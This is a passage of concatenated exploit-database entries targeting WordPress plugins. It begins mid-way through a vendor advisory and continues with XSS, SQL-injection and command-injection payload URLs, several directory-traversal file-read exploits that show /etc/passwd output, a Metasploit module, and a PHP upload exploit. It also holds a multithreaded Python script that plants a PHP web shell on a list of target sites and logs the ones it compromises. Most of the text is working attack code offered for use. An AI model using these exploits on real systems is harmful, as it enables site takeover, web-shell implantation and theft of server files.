is_trash = 0 WHERE id IN ($ids)");
---------
4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerability. All users are strongly advised to update WordPress Easy
Modal plugin to the latest available version.
5. Credits
==========
Discovered with DefenseCode ThunderScan source code security analyzer
by Neven Biruski.
6. Disclosure Timeline
======================
2017/04/04 Vendor contacted
2017/04/06 Vendor responded
2017/04/13 Update released
2017/08/07 Advisory released to the public
7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for free software trial on our website
http://www.defensecode.com/ .
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
# Date: 2/27/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/easy-cookies-policy/
# Version: 1.6.2
# Tested on: Windows 10
# CVE: CVE-2021-24405
1. Description:
Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.
If users can't register, this can be done through CSRF.
2. Proof of Concept:
POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 226
Origin: http://localhost
Connection: keep-alive
Host: localhost
Cookie: [Any authenticated user]
action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd
# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)
# Date: 14/01/2021
# Exploit Author: Rahul Ramakant Singh
# Vendor Homepage: https://ghozylab.com/plugins/
# Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/
# Version: 1.1.7
# Tested on Windows
Steps:
1. Install WordPress 5.6
2. Install and activate *Contact Form Plugin* plugin.
3. Go to * Contact Form Plugin *plugin section and click on the add new form button.
4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite.
6. Append the JavaScript payload in the "Email Header" field as mentioned below
*"<sc><svg/onload=alert(454)>"*
5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up.
source: https://www.securityfocus.com/bid/64167/info
WordPress Easy Career Openings plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/career-details/?jobid=3'[Sql Injection]
# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
# Date: 16/02/2022
# Exploit Author: Overthinker1877 (1877 Team)
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Version: 6.60
# Tested on: Windows / Linux
import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
init(autoreset=True)
fr = Fore.RED
gr = Fore.BLUE
fc = Fore.CYAN
fw = Fore.WHITE
fy = Fore.YELLOW
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
Bad = 0
Good = 0
def Folder(directory):
if not os.path.exists(directory):
os.makedirs(directory)
Folder("exploited")
def clear():
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except:
pass
def finder(i) :
global Bad,Good
head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
try :
x = requests.session()
listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
for script in listaa :
url = (i+"/"+script)
while True :
req_first = x.get(url, headers=head)
if "error:http raw post data does not exist" in req_first.text :
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)
urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")
req_second = x.get(urlx, headers=head)
if "Overthinker1877" in req_second.text :
Good = Good + 1
print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
with open("exploited/shell.txt","a") as file :
file.write(urlx+"\n")
file.close()
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")
pass
break
except :
pass
if os.name == 'nt':
ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
else :
sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))
def key_logo():
clear = '\x1b[0m'
colors = [36, 32, 34, 35, 31, 37]
x = ' [ + ] OVERTHINKER1877 EXPLOIT'
for N, line in enumerate(x.split('\n')):
sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))
time.sleep(0.05)
def process(line):
time.sleep(1)
def run() :
key_logo()
clear()
print("""
[-] -----------------------------------------[-]
[+] WwW.1877.TeaM
[-] -----------------------------------------[-]
\n \n""")
file_name = input("Website List : ")
op = open(file_name,'r').read().splitlines()
TEXTList = [list.strip() for list in op]
p = Pool(int(input('Thread : ')))
p.map(finder, TEXTList)
run()
###################################################################################################
# Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability
# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/
# Author: bl4ck-dz
# Date: 28/05/2015
# Infected File: upload.php
# Category: webapps
# Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/
# Tested on : Linux | Windows
###################################################################################################
<?php
$evil="dz.phtml";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file_field'=>"@$evil"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";
?>
Shell Access :
http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil
# GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !
source: https://www.securityfocus.com/bid/68525/info
WordPress DZS-VideoGallery plugin is prone to multiple cross site scripting vulnerabilities and a command-injection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to execute arbitrary OS commands. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DZS-VideoGallery 7.85 is vulnerable; prior versions are also affected.
Cross-site-scripting:
http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Command-Injection:
http://www.example.com/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://www.example.com/1.jpg$(os-cmd)
# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/
# Date: 2/12/2021
# Exploit Author: Uriel Yochpaz
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Software Link:
# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
# Tested on: Linux (DZS Zoomsounds version 5.82)
# CVE : CVE-2021-39316
The vulnerability allows a remote attacker to perform directory traversal attacks.
The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.
Mitigation:
Install update from vendor's website.
Vulnerable software versions ZoomSounds:
1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,
2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,
3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,
5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
PoC:
user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
* Exploit Title: Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities <=8.60
* Discovery Date: 01.05.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://digitalzoomstudio.net/
* Software Link: http://codecanyon.net/item/video-gallery-wordpress-plugin-w-youtube-vimeo-/157782
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: <=8.60
* Tested on: Wordpress 4.2.x-4.4.x
* OVE-20160305-2497
Technical details:
Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
if(isset($_GET['initer'])){
$initer = $_GET['initer'];
}
Line 27 (unsanitized output):
<?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------
Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/tagseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
if(isset($_GET['initer'])){
$initer = $_GET['initer'];
}
Line 27 (unsanitized output):
<?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------
Unauthenticated CSRF & XSS:
POC(s):
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1)<%2fscript>894ba&type=&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=7934f"><script>alert(1)<%2fscript>99085&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=&width=54fd7"><script>alert(1)<%2fscript>4708b
Line 25 & 35 (unsanitized input & direct output):
$w = $_GET['width'];
<param name="flashvars" value="video=' . $_GET['source'] . '&types=' . $_GET['type'] . '&defaultQuality=hd" width="' . $w . '" height="' . $h . '">'.$backup.'
source: https://www.securityfocus.com/bid/53513/info
Dynamic Widgets plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Dynamic Widgets 1.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/themes.php?page=dynwid-config&action=edit&id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: <= 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2552
# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552
#Product:
WordPress Plugin Duplicator <= 1.4.7
#Vulnerability:
1-Some system information may be disclosure.
#Proof-Of-Concept:
1-System information.
Some system information is obtained using the "view" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: < 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2551
# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551
#Product:
WordPress Plugin Duplicator < 1.4.7
#Vulnerability:
1-It allows an attacker to download the backup file.
#Proof-Of-Concept:
1-Backup download.
The backup file can be downloaded using the "is_daws" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Duplicator File Read Vulnerability',
'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.},
'References' =>
[
['CVE', '2020-11738'],
['WPVDB', '10078'],
['URL', 'https://snapcreek.com/duplicator/docs/changelog']
],
'Author' =>
[
'Ramuel Gall', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team' # Metasploit module
],
'DisclosureDate' => 'Feb 19 2020',
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
])
end
def check
check_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24')
end
def run_host(ip)
traversal = '../' * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ /^\//
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'),
'vars_get' =>
{
'action' => 'duplicator_download',
'file' => "#{traversal}#{filename}"
}
})
fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'duplicator.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738
import requests as re
import sys
if len(sys.argv) != 3:
print("Exploit made by nam3lum.")
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
exit()
arg = sys.argv[1]
file = sys.argv[2]
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
output = re.get(url = URL)
print(output.text)